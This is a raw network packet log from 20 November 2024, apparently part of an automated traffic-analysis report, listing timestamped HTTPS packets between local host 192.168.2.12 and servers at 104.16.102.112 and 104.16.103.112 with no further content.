                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.188883066 CET44349726104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.188896894 CET44349726104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.188929081 CET49726443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.188937902 CET44349726104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.188977957 CET49726443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.189348936 CET44349726104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.192985058 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.197304010 CET44349726104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.197382927 CET49726443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.197396994 CET44349726104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.197412968 CET44349726104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.197460890 CET49726443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.197608948 CET44349725104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.197670937 CET44349725104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.197714090 CET49725443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.197742939 CET44349725104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.197757959 CET44349725104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.197807074 CET49725443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.198091030 CET49726443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.198107004 CET44349726104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.198493004 CET49730443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.198523045 CET44349730104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.198574066 CET49730443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.199635029 CET49730443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.199647903 CET44349730104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.200453997 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.200498104 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.200500011 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.200514078 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.200563908 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.207508087 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.208172083 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.208204985 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.208223104 CET49729443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.208235025 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.208247900 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.208272934 CET49729443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.208307028 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.208336115 CET49729443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.208343983 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.208580971 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.210882902 CET49725443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.210901976 CET44349725104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.213838100 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.213896036 CET49729443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.213910103 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.216281891 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.216361046 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.216404915 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.216406107 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.216437101 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.216473103 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.219515085 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.223325968 CET44349728104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.223400116 CET44349728104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.223436117 CET49728443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.223438025 CET44349728104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.223459959 CET44349728104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.223498106 CET44349728104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.223499060 CET49728443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.223520994 CET44349728104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.223552942 CET49728443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.223561049 CET44349728104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.227325916 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.227369070 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.227382898 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.232017040 CET44349728104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.232059002 CET49728443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.232069016 CET44349728104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.233195066 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.233230114 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.233236074 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.239880085 CET44349728104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.239923000 CET49728443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.239929914 CET44349728104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.241590977 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.241632938 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.241640091 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.261692047 CET49729443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.261714935 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.263354063 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.291992903 CET44349724104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.294226885 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.294411898 CET49728443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.294420958 CET44349728104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.308532000 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.309518099 CET49729443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.327328920 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.331485987 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.331541061 CET49729443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.331562996 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.338496923 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.342463017 CET49724443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.342483997 CET49728443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.342492104 CET44349724104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.346055031 CET44349728104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.357855082 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.370620966 CET44349724104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.370687008 CET49724443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.370713949 CET44349724104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.371423006 CET49729443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.375051022 CET49731443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.375097990 CET44349731104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.375166893 CET49731443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.375459909 CET49731443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.375473022 CET44349731104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.381803036 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.382535934 CET44349724104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.382580996 CET44349724104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.382615089 CET49724443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.382643938 CET44349724104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.382662058 CET44349724104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.382700920 CET49724443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.383032084 CET49724443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.383052111 CET44349724104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.385807991 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.385873079 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.385899067 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.386806965 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.386806965 CET49728443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.386838913 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.388845921 CET49732443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.388887882 CET44349732104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.389106989 CET49732443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.389233112 CET49732443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.389249086 CET44349732104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.395616055 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.395663023 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.395694971 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.395709991 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.395773888 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.403695107 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.411829948 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.411875010 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.411943913 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.411962986 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.412018061 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.415210962 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.422468901 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.423415899 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.423494101 CET49729443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.423518896 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.427133083 CET44349728104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.431175947 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.431227922 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.431262970 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.431289911 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.431310892 CET49729443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.431338072 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.433168888 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.433197975 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.435026884 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.435081005 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.435101032 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.437203884 CET44349728104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.437308073 CET49728443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.437331915 CET44349728104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.438829899 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.438885927 CET49729443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.438905954 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.439192057 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.439332008 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.439342022 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.443334103 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.443406105 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.443425894 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.445473909 CET44349728104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.445523024 CET44349728104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.445548058 CET49728443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.445564985 CET44349728104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.445611000 CET49728443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.446449995 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.446531057 CET49729443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.446551085 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.447449923 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.447535992 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.447550058 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.450978994 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.451035976 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.451050043 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.452872038 CET44349728104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.452959061 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.452972889 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.453026056 CET49729443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.453048944 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.453074932 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.453082085 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.455864906 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.455965042 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.455991983 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.458386898 CET44349728104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.458486080 CET49728443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.458502054 CET44349728104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.467534065 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.467582941 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.467587948 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.467602968 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.468051910 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.469295979 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.469317913 CET44349728104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.469388962 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.469391108 CET49729443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.469418049 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.469418049 CET49728443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.469449043 CET44349728104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.469458103 CET49729443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.473619938 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.474112988 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.474191904 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.474196911 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.474220991 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.474263906 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.476011992 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.477391005 CET44349728104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.477473021 CET49728443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.477494955 CET44349728104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.479789972 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.479846954 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.479859114 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.482153893 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.482491970 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.482518911 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.482559919 CET49729443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.482582092 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.482614994 CET49729443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.485359907 CET44349728104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.485429049 CET49728443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.485455990 CET44349728104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.487447023 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.487484932 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.487505913 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.487519979 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.487571001 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.487610102 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.488943100 CET44349728104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.489005089 CET49728443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.489012957 CET44349728104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.492175102 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.492856979 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.492918968 CET49729443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.492927074 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.498640060 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.498708010 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.498718977 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.499375105 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.499428988 CET49729443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.499449968 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.502114058 CET44349728104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.502188921 CET49728443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.502197981 CET44349728104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.502234936 CET44349728104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.502454996 CET49728443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.505765915 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.506089926 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.506155014 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.506162882 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.506189108 CET49729443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.506205082 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.507016897 CET49728443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.507030964 CET44349728104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.511931896 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.511998892 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.512006044 CET44349727104.16.103.112192.168.2.12
